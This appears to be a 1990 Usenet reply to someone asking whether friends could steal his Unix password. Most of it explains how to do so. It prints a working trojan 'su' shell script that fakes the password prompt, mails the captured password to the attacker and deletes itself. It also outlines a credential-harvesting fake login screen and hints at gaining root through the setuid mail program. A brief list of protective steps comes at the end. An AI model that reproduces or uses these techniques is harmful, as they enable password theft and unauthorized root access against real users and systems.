jr@bwilab3.UUCP (Eugene W Coleman) (09/21/90)
In-Reply-To: your article <8354@helios.TAMU.EDU> > Some of my friends are challenging me > saying that they will be ale to tell > my password in a relatively short time. > > Is it possible to break passwords so > easily in Unix Systems ? Is it > possible to "catch" passwords while > they are being typed at the terminal ? > > Suresh Peram Sorry I had to post this. I attempted to mail my response but it was returned. Suresh, You really haven't supplied enough information for me to answer but I can give you some clues as to how they might accomplish this. Stick this version of 'su' in a directory that is in a users PATH shell variable prior to the /bin. idiot=$1 stty -echo echo "Password:\c" read IdiotsPwd echo "" stty echo echo $idiot\'s passwd is $IdiotsPwd | mail 'your-login-id' sleep 1 echo "su: Sorry" rm su You can also apply the same ideas to .profile and .login files. or Write a program that creates a login screen to accept their login and passwd. Have it fail the first and second attempt ( 2 copies to validate from) then have the program mail the values of those variables to you and delete itself. Then getty will take the port and service their login. or Only a hint: (very powerful) The mail program has set user id permission thus a properly placed hard link and mail message could get you the root login in a flash. If you would like to protect yourself lock up your cron.tab, .profile, mail command, move important commands, and set up aliases with the full path to things like su. Or don't give anyone a login/passwd on your system. Well I hope this helps you out. Remember.... as long as there is security there will be breeches. jr ******************************************************************************* * Eugene W. Coleman, Jr | Bradley Ward Inc. | Mental Marksman at Large * * (404) 396-4292 | Atlanta, Ga 30328 | * * That place we call %*@!&$! ...uunet!gatech!galbp!bwilab3!jr * * * * HP always asks 'What if', We can't stop asking 'WHY' ? * * * *******************************************************************************